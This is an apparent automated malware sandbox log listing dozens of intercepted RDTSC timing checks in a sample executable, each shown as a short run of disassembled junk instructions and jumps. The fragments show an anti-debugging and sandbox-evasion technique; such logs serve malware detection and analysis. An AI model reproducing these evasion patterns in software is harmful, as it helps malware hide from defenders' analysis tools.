Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B95A34 second address: B95A8E instructions: 0x00000000 rdtsc 0x00000002 jp 00007F91A0CEF8B4h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F91A0CEF8ACh 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 jnc 00007F91A0CEF8A6h 0x0000001e popad 0x0000001f pushad 0x00000020 pushad 0x00000021 popad 0x00000022 jmp 00007F91A0CEF8B5h 0x00000027 jmp 00007F91A0CEF8B9h 0x0000002c pushad 0x0000002d popad 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B95D49 second address: B95D5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jnp 00007F91A0CE39A6h 0x0000000c jng 00007F91A0CE39A6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B98712 second address: B9873F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F91A0CEF8AFh 0x0000000d jmp 00007F91A0CEF8B6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B9873F second address: B98743 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B98743 second address: B98749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B9C499 second address: B9C4BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F91A0CE39B8h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B9C4BC second address: B9C4C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B9B777 second address: B9B78A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F91A0CE39AEh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B9B8CC second address: B9B8D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B9BCEA second address: B9BCEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B9C130 second address: B9C142 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F91A0CEF8ACh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B9C142 second address: B9C184 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b push edi 0x0000000c pop edi 0x0000000d jbe 00007F91A0CE39A6h 0x00000013 pop edi 0x00000014 pushad 0x00000015 jmp 00007F91A0CE39B3h 0x0000001a jmp 00007F91A0CE39B7h 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B9C184 second address: B9C190 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F91A0CEF8A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B9C190 second address: B9C194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BA0950 second address: BA0954 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BA0954 second address: BA0966 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F91A0CE39ACh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BA0966 second address: BA0986 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F91A0CEF8B6h 0x00000008 je 00007F91A0CEF8B2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BA8FE5 second address: BA8FF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F91A0CE39A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BA8FF1 second address: BA8FF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BA8FF5 second address: BA8FF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BA8FF9 second address: BA8FFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BA720B second address: BA7211 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BA7211 second address: BA7217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BA7217 second address: BA722A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jnc 00007F91A0CE39A6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BA74E0 second address: BA74E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BA7694 second address: BA76A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0CE39ABh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BA7844 second address: BA784A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BA7ED5 second address: BA7EDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BA7EDB second address: BA7EDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BA8DF1 second address: BA8DFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007F91A0CE39A6h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BB1FA4 second address: BB1FAA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BB2319 second address: BB231F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BB231F second address: BB2325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BB2325 second address: BB2353 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0CE39B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F91A0CE39A6h 0x00000011 jmp 00007F91A0CE39AAh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BC0D71 second address: BC0D75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BC0D75 second address: BC0D7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BC0D7B second address: BC0DA0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnc 00007F91A0CEF8A6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F91A0CEF8B0h 0x00000014 jo 00007F91A0CEF8A6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BC0DA0 second address: BC0DA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BC474F second address: BC4762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F91A0CEF8A6h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F91A0CEF8A6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BC4762 second address: BC476C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F91A0CE39A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BC442A second address: BC442E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BC442E second address: BC443A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F91A0CE39A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BC443A second address: BC443E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BC443E second address: BC445B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F91A0CE39B3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BC445B second address: BC445F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BC445F second address: BC4463 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BCCB80 second address: BCCB86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BCCB86 second address: BCCBC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0CE39B3h 0x00000007 jmp 00007F91A0CE39B8h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F91A0CE39AAh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BCCBC1 second address: BCCBC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BD36E7 second address: BD36EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BD36EB second address: BD36F9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BD36F9 second address: BD3719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F91A0CE39B9h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BD3719 second address: BD3731 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F91A0CEF8A6h 0x00000008 jmp 00007F91A0CEF8AEh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BD6727 second address: BD672B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BD672B second address: BD6731 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BD6731 second address: BD6737 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BD6737 second address: BD673C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BD673C second address: BD6745 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BD6745 second address: BD674F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F91A0CEF8A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BDB741 second address: BDB75A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F91A0CE39B5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BE0517 second address: BE053E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F91A0CEF8ADh 0x00000009 jmp 00007F91A0CEF8B6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BE0EFA second address: BE0F08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BE0F08 second address: BE0F0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BE0F0E second address: BE0F1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jne 00007F91A0CE39A6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BE0F1C second address: BE0F3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F91A0CEF8A6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F91A0CEF8B3h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BE0F3E second address: BE0F42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BE0F42 second address: BE0F48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BE1904 second address: BE191B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F91A0CE39B3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BE191B second address: BE1925 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BE5E26 second address: BE5E2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BE5E2C second address: BE5E4F instructions: 0x00000000 rdtsc 0x00000002 je 00007F91A0CEF8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d jmp 00007F91A0CEF8B4h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BE7893 second address: BE78B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F91A0CE39B7h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BE78B1 second address: BE78BB instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F91A0CEF8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BF5580 second address: BF5584 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BF1949 second address: BF195D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F91A0CEF8AEh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: BF195D second address: BF196A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F91A0CE39AEh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: C06967 second address: C06971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F91A0CEF8A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: C1C4B3 second address: C1C4D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F91A0CE39B9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: C1C4D2 second address: C1C4EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0CEF8B7h 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: C1B3E9 second address: C1B3FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0CE39ABh 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: C1B6AC second address: C1B6B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: C1B82B second address: C1B82F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: C1B82F second address: C1B859 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007F91A0CEF8BDh 0x00000013 jmp 00007F91A0CEF8B7h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: C1BC75 second address: C1BC83 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F91A0CE39A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: C1BC83 second address: C1BC87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: C1BEC0 second address: C1BECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: C1DB9D second address: C1DBA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: C1DBA1 second address: C1DBAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F91A0CE39A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: C20850 second address: C20855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: C20855 second address: C208A6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jc 00007F91A0CE39A6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F91A0CE39ABh 0x00000012 nop 0x00000013 mov dh, 6Ch 0x00000015 push 00000004h 0x00000017 mov edx, dword ptr [ebp+122D3AFDh] 0x0000001d call 00007F91A0CE39A9h 0x00000022 jnp 00007F91A0CE39AAh 0x00000028 push eax 0x00000029 pushad 0x0000002a jl 00007F91A0CE39A8h 0x00000030 ja 00007F91A0CE39A8h 0x00000036 popad 0x00000037 mov eax, dword ptr [esp+04h] 0x0000003b pushad 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: C20B05 second address: C20B09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: C21FBE second address: C21FC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: C21FC2 second address: C21FD2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F91A0CEF8A6h 0x00000008 jng 00007F91A0CEF8A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: C23D90 second address: C23D97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: C23D97 second address: C23DB2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F91A0CEF8ABh 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007F91A0CEF8A6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: C23DB2 second address: C23DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: C23DB6 second address: C23DD6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0CEF8AAh 0x00000007 jc 00007F91A0CEF8A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jp 00007F91A0CEF8C0h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
